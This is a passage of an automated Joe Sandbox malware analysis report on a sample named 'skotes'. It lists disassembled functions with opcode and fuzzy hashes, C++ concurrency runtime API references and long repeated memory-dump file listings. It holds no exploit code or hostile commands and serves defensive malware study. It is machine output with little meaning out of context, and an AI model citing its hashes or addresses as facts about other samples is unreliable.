                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3844194624-0
                                                                                                                                                                                                                                                  • Opcode ID: 2454b121aa889f753a7f2cd33cd7c67b4c90c6f0db288f0c80c153a35adc7694
                                                                                                                                                                                                                                                  • Instruction ID: 72ff07cdbf571d0dbced7181932a47abbd8dd5f09582f51671c968b0033da134
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2454b121aa889f753a7f2cd33cd7c67b4c90c6f0db288f0c80c153a35adc7694
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3016231601521BBCE25FB63D8C6DAEBF69BF84714705043FF50497652DB28EC119798
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ListArray.LIBCONCRT ref: 0049D0C5
                                                                                                                                                                                                                                                  • ListArray.LIBCONCRT ref: 0049D0D7
                                                                                                                                                                                                                                                    • Part of subcall function 0049C6B2: _InternalDeleteHelper.LIBCONCRT ref: 0049C6C4
                                                                                                                                                                                                                                                  • ListArray.LIBCONCRT ref: 0049D0E1
                                                                                                                                                                                                                                                  • _InternalDeleteHelper.LIBCONCRT ref: 0049D0FA
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3844194624-0
                                                                                                                                                                                                                                                  • Opcode ID: 1c71a17fd2b4e54ed84a6505318bfa56e42f7f8d775e01d98b3dd7f77e0d7ca6
                                                                                                                                                                                                                                                  • Instruction ID: f4b962f63d178705ebbc3e813539b8c8b6503326d896209287bdc2c8ad4ba652
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c71a17fd2b4e54ed84a6505318bfa56e42f7f8d775e01d98b3dd7f77e0d7ca6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6301D632A01521AFCE25BB62D8C6D6EBF69BF44714700043FF80497652DF28AC5187A8
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 004A33DB
                                                                                                                                                                                                                                                  • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 004A33EF
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 004A3407
                                                                                                                                                                                                                                                  • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004A341F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 78362717-0
                                                                                                                                                                                                                                                  • Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                                                                                                                                                                                                                  • Instruction ID: 8ec7ed939cbf21ab39a7e3126b851ef8ce3da146f7882de07bde7e60d0c8ceb4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD012B32600514A7CF16EE558841AEF77999F66314F10001BFC119B382EA75EE1193A4
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00499519
                                                                                                                                                                                                                                                    • Part of subcall function 0048F4CB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00495486
                                                                                                                                                                                                                                                  • Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 0049953D
                                                                                                                                                                                                                                                  • Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 00499550
                                                                                                                                                                                                                                                  • Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00499559
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 218105897-0
                                                                                                                                                                                                                                                  • Opcode ID: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                                                                                                                                                                                                                  • Instruction ID: 508c7186007c34897d99dc159295af976b4da89a1705914035b98d6d12d9d99e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04F0A732200A206EEE72AB5D8811F6B27949F41729F01C42FE41B97242CE2CED46CB49
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
